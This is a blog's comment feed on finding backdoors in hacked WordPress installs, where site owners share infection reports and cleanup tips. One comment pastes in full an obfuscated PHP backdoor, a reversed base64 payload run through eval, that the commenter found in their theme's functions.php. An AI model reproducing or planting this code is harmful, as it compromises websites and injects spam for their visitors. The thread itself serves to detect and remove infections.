Comments on: How to find a backdoor in a hacked WordPress http://ottopress.com/2009/hacked-wordpress-backdoors/ You have to use an Ottopress to get fresh squeezed Otto. Fri, 17 May 2013 22:57:25 +0000 hourly 1 http://wordpress.org/?v=3.6-beta2-24237 By: thearchitekt http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-2/#comment-11811 thearchitekt Sun, 28 Apr 2013 15:01:35 +0000 http://ottopress.com/?p=41#comment-11811 I found a bunch of spammy links on the homepage of my site, looked further and found this in my functions. I’m fairly certain the hacker came in through the server. It’s a shared server and I was able to thumb my way up through the folders until I was inside the server and back down into the other sites hosted there using ftp. I had no idea it was that easy.

<?php $wp_function_initialize = create_function('$a',strrev(';)a$(lave')); $wp_function_initialize(strrev(';))"=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"(edoced_46esab(lave'));?>
]]> By: Alex http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-2/#comment-11752 Alex Sun, 07 Apr 2013 22:58:26 +0000 http://ottopress.com/?p=41#comment-11752 Even though this exploit is a few years old, I’m still seeing it happening on many websites.

]]> By: Wordpress Security for Designers http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-2/#comment-11714 Wordpress Security for Designers Tue, 19 Mar 2013 14:00:54 +0000 http://ottopress.com/?p=41#comment-11714 [...] Find the hacker backdoor that leaves you vulnerable: See Otto on removing hacker backdoors [...]

]]> By: Derry Birkett http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-2/#comment-11713 Derry Birkett Tue, 19 Mar 2013 13:48:03 +0000 http://ottopress.com/?p=41#comment-11713 Often these backdoors are inserted with a server “owner” eg. apache:apache rather than an FTP user, and if you spot the hack straight away you can also filter by date and check for new files of that day: This will often locate a poorly hidden backdoor. i.e. you find a file in /uploads/ (for example) with todays date and the owner is apache:apache.

]]> By: WordPress sites http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-11448 WordPress sites Mon, 03 Dec 2012 16:23:03 +0000 http://ottopress.com/?p=41#comment-11448 [...] This has nothing to do with DNS resolution – and the above error is a somewhat generic one, however with the "eval" in there I'd bet that you've been hacked. Take a look here: http://ottopress.com/2009/hacked-wordpress-backdoors/ [...]

]]> By: sam http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-11212 sam Sun, 09 Sep 2012 01:26:59 +0000 http://ottopress.com/?p=41#comment-11212 i have the same garbage. can i delete this entry safely?

SELECT *
FROM `information_schema`.`PROCESSLIST`
WHERE (
`ID` LIKE ‘%clomid%’
OR `USER` LIKE ‘%clomid%’
OR `HOST` LIKE ‘%clomid%’
OR `DB` LIKE ‘%clomid%’
OR `COMMAND` LIKE ‘%clomid%’
OR `TIME` LIKE ‘%clomid%’
OR `STATE` LIKE ‘%clomid%’
OR `INFO` LIKE ‘%clomid%’
)
LIMIT 0 , 30

]]> By: Otto http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-11196 Otto Fri, 31 Aug 2012 04:22:57 +0000 http://ottopress.com/?p=41#comment-11196 As much as I dislike the NextGen Gallery plugin, that’s not actually in there. You may have gotten hacked in some other manner and that file was simply added to the plugin directory. Because I’m not seeing anything particularly special in the plugin code itself:
http://plugins.svn.wordpress.org/nextgen-gallery/trunk/

]]> By: dc http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-11195 dc Fri, 31 Aug 2012 04:05:03 +0000 http://ottopress.com/?p=41#comment-11195 With the help of this post, I have exposed the NextGEN Gallery plugin as having a backdoor into my WP install. Checkout the plugin’s “admin.php” file; you’ll notice it pulls a bunch of data from a remote url and dumps it into a wp option in the database. It then creates users and blog posts in mass using combinations of the data received. A huge PITA since this was registering 400+ users daily. Thanks for the suggestions!

]]> By: nessy http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-11163 nessy Mon, 20 Aug 2012 02:49:27 +0000 http://ottopress.com/?p=41#comment-11163 Hello guys! I need your help. Please. I have a back door.

-I have share hosting in godaddy.
-Before only my root site was getting effecting and i was deleting the code, or restoring, but now
-all my sites got infected. In almost all php files end with this:

Please help me! I don’t know what to do. I asked sucuri.net but they said they charge for all folders each. I have one kind of injection. I can’t pay for all. Any help is appreciated.

One of the htaccess. I delete the injected code, and then I realized they got injected to other sites, too..

Pleaseeeee… I’m dealing with these for the last 2-3 months, and don’t know what to do..

Godaddy of course doesn’t help at all.. :(

Thank you…

Any suggestion??

]]> By: What Action To Take If Your Wordpress Site Gets Hacked | Tims Marketing Blog http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-11144 What Action To Take If Your Wordpress Site Gets Hacked | Tims Marketing Blog Wed, 15 Aug 2012 02:49:19 +0000 http://ottopress.com/?p=41#comment-11144 [...] This site will help you with ‘backdoor’ hacks but it will probably be too technical for many WP users. http://ottopress.com/2009/hacked-wordpress-backdoors/ [...]

]]>